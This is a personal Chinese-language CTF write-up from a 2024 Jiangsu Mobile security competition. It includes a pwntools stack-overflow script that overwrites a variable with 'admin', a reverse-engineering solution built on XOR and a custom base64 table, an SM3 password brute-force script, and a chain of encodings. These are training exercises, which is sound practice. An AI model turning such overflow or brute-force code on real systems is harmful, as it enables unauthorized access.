2024 年江苏移动“赋能建功”网络安全技能竞赛竞赛个人 wp

只做了几个题。。。二进制手被薄纱了

pwn

签到

栈溢出,覆盖 s1 为 admin 即可

1
2
3
4
5
6
7
from pwn import *
io = process('./p')
#io = remote("172.20.103.5", 43736)
payload = b'A' * 16  # 填充到s1位置
payload += b'admin'  # 覆盖s1为"admin"
io.sendline(payload)
io.interactive()

re

签到

image-20241116095527090

flag{re_1basic_re_12}

eznote

分析源码,先后经过了 sub_140001010 和 sub_140001630 两次加密最后的密文是 byte_140007038

1
2
3
4
5
6
7
unsigned char byte_140007038[] =
{
  0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40, 0x17, 0x20,
  0x49, 0x31, 0x02, 0x2D, 0x02, 0x1C, 0x1E, 0x35, 0x3D, 0x4D,
  0x1E, 0x1B, 0x49, 0x2E, 0x0D, 0x2A, 0x3C, 0x2A, 0x4D, 0x2D,
  0x00, 0x00
};

分析 sub_140001630

1
2
3
4
5
6
7
8
9
10
11
12
__int64 sub_140001630()
{
  __int64 result; // rax
  int i; // [rsp+0h] [rbp-18h]

  for ( i = 0; i < 29; ++i )
  {
    byte_140007038[i] ^= 0x78u;
    result = (unsigned int)(i + 1);
  }
  return result;
}

对 byte_140007038 进行 0x78 异或

分析 sub_140001010

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
__int64 __fastcall sub_140001010(__int64 a1, unsigned int a2, __int64 a3)
{
  unsigned __int8 v4; // [rsp+0h] [rbp-28h]
  unsigned __int8 v5; // [rsp+1h] [rbp-27h]
  unsigned int v6; // [rsp+4h] [rbp-24h]
  unsigned int v7; // [rsp+4h] [rbp-24h]
  unsigned int v8; // [rsp+4h] [rbp-24h]
  int v9; // [rsp+8h] [rbp-20h]
  unsigned int i; // [rsp+Ch] [rbp-1Ch]

  v9 = 0;
  v5 = 0;
  v6 = 0;
  for ( i = 0; i < a2; ++i )
  {
    v4 = *(_BYTE *)(a1 + i);
    if ( v9 )
    {
      if ( v9 == 1 )
      {
        v9 = 2;
        *(_BYTE *)(a3 + v6) = byte_140004400[((int)v4 >> 4) & 0xF | (16 * (v5 & 3))];
      }
      else
      {
        v9 = 0;
        *(_BYTE *)(a3 + v6++) = byte_140004400[((int)v4 >> 6) & 3 | (4 * (v5 & 0xF))];
        *(_BYTE *)(a3 + v6) = byte_140004400[v4 & 0x3F];
      }
      ++v6;
    }
    else
    {
      v9 = 1;
      *(_BYTE *)(a3 + v6++) = byte_140004400[((int)v4 >> 2) & 0x3F];
    }
    v5 = v4;
  }
  if ( v9 == 1 )
  {
    *(_BYTE *)(a3 + v6) = byte_140004400[16 * (v5 & 3)];
    v7 = v6 + 1;
    *(_BYTE *)(a3 + v7++) = 61;
    *(_BYTE *)(a3 + v7) = 61;
    v6 = v7 + 1;
  }
  else if ( v9 == 2 )
  {
    *(_BYTE *)(a3 + v6) = byte_140004400[4 * (v5 & 0xF)];
    v8 = v6 + 1;
    *(_BYTE *)(a3 + v8) = 61;
    v6 = v8 + 1;
  }
  *(_BYTE *)(a3 + v6) = 0;
  return v6;
}

byte_140004400 为码表进行 base64,其中 byte_140004400 是

1
2
3
4
5
6
7
8
9
10
unsigned char byte_140004400[] =
{
  0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A,
  0x4B, 0x4C, 0x4D, 0x4E, 0x30, 0x50, 0x51, 0x52, 0x53, 0x54,
  0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64,
  0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E,
  0x4F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
  0x79, 0x7A, 0x6F, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
  0x38, 0x39, 0x2B, 0x2F
};

也就是 ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 自定义编码表
ida_chars = [
    0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A,
    0x4B, 0x4C, 0x4D, 0x4E, 0x30, 0x50, 0x51, 0x52, 0x53, 0x54,
    0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64,
    0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E,
    0x4F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
    0x79, 0x7A, 0x6F, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
    0x38, 0x39, 0x2B, 0x2F
]

encoded_chars = ''.join(chr(c) for c in ida_chars)
print(encoded_chars)
# ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
#include <string.h>

int main()
{
    unsigned char ida_chars[] =
        {
            122, 54, 23, 58, 52, 53, 73, 64, 23, 32,
            73, 49, 2, 45, 2, 28, 30, 53, 61, 77,
            30, 27, 73, 46, 13, 42, 60, 42, 77, 45,
            0, 0};
    for (int i = 0; i < 29; ++i)
    {
        ida_chars[i] ^= 0x78u;
    }
    printf("%s\n", ida_chars);
    return 0;
}
// NoBLM18oX1IzUzdfME5fc1VuRDR5-

image-20241116102800638

flag{7@K3_4_R3S7_0N_sUnD4y}

Cy

easy-sm

根据已知信息

哈希:f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0

前五个字符:admin

明文长度:11

暴力破解

1
2
3
4
5
6
7
8
9
10
11
from gmssl import sm3, func
target_hash = "f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0"
for i in range(100000, 1000000):
    test_password = f"admin{i}"  # 例如:admin100000, admin100001, ...
    # 计算SM3哈希值
    calculated_hash = sm3.sm3_hash(func.bytes_to_list(test_password.encode()))
    if calculated_hash == target_hash:
        print(f"flag{{{test_password}}}")
        break
else:
    print("no")

misc

image-20241116123305752

发现是 base62 编码,继续破解

image-20241116123702202

猜测是 rot13

image-20241116123602342

栅栏密码两栏有 flag 特征

image-20241116123810903

flag{eff05341-9bf6-4e9c-b167-bf7dcb168bc5}